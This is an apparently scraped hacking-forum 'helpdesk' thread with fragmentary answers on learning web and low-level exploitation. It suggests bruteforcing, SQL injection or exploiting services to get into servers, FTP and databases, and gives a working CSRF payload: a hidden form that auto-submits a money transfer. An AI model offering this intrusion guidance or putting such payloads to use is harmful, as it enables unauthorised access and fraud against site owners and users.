[Helpdesk] Answering any question you have. [Helpdesk]

There are too many cancerous threads posted in this section that are made specifically to ask one question and it's turning this section into shit.

So go for it, ask any and every question you have (hacking related, of course) and I will answer it honestly and thoroughly.

Currently I'm using ccleaner professional and webroot, along with a geeksquad membership. To add on to this, since I'm rather new, how should I get started. Any particular sections and or programs you could refer me to? Of course I have no money atm.

For Windows antivirus-related things I recommend MBAE, MWB, EMET, and Comodo.

For Linux, all you'll need is grsec.

For getting started in web application exploitation, I highly recommend learning PHP and MySQL first because that's what you'll mostly be working with. People that tell you to start with HTML and CSS for web hacking purposes are fucking stupid, don't mind them. It won't advance your skills in hacking whatsoever.

For getting started in low-level (machine) based exploitation, I recommend learning Assembly and C. Every operating system's foundation is built in Assembly, learning it is the only way to actually know what's going on in a computer. C is just good to know all around. Assembly is also crucial to be able to craft kernel exploits and/or other exploits such as buffer overflows, heap overflows, spraying, etc.

If you haven't caught on yet, you have to learn the programming language(s) related to the type of hacking you want to perform otherwise you will turn into a skid.

I was thinking of setting up something that monitors all traffic sent and received on my phone, then sending myself an SMS. It's bound to show up somewhere right?

There are several web-based tools for this.

The one I like to use is http://www.freesmsgateway.info/

http://themacadmin.com/email-to-sms-gateways/

Scroll down a little bit and it gives you a list of everything.

I don't have much experience with hacking Winblows servers but if I had to take a guess I'd say actually shelling the server via a vulnerable service or bruteforcing the login.

For FTP, try doing ftp://server_url_or_ip_goes_here or ftp.something.com
Or, once again, exploitation or bruteforcing.

As for database access, if it's running a web service try and find SQLi on that. Sometimes it will have a configuration panel running on something like 8080 or 8081 with a login, granting you access to the database. Or, last but not least, exploitation or bruteforcing.

>XSS or any client sided attack without HTML
yes yes good luck

also you can, in some cases, use CSS in XSS for example XBL which allows JS and is embed inside CSS. Not even talking about browser-related elevations you can do. more here:

of course you'll be absolutely fine without learning HTML/CSS, but not every single thing you ever learn must be used in hacking. This is basic shit you need to understand for the sole purpose of knowing what the fuck is a website

what should i do?

Most hacking nowadays hardly requires any math, the computers do it for us. As long as you know what ebp+4 means when you're looking at assembly instructions, you're going to be fine.

I suppose learning HTML or Javascript would be good for XSS related things but what are the chances that XSS is ever escalated?
It's good for CSRF too, but all you need to know is

Code
<html>
<head>
</head>
<body [b]onload=[/b]"document.forms[0].submit()">
<form action="http://cocks.com/transfer.php" method="post">
<input type="hidden" name="money" value="1000000" />
<input type="hidden" name="email" value="[email protected]" />
</form>
</body>
</html>

Please nothing that costs more than $10 a month.

The only one I know of is ecatel which sells dedis at $30 a month, sorry.

You could try finding ecatel resellers that sell cheap VPSs.

I'm using C++ and Pythin, so throw away some suggestions.

Other than the two you mentioned
  • VB.NET, C# for Windows development

  • C++/C for Linux development

  • Objective-C for Mac development

  • Java for all around development
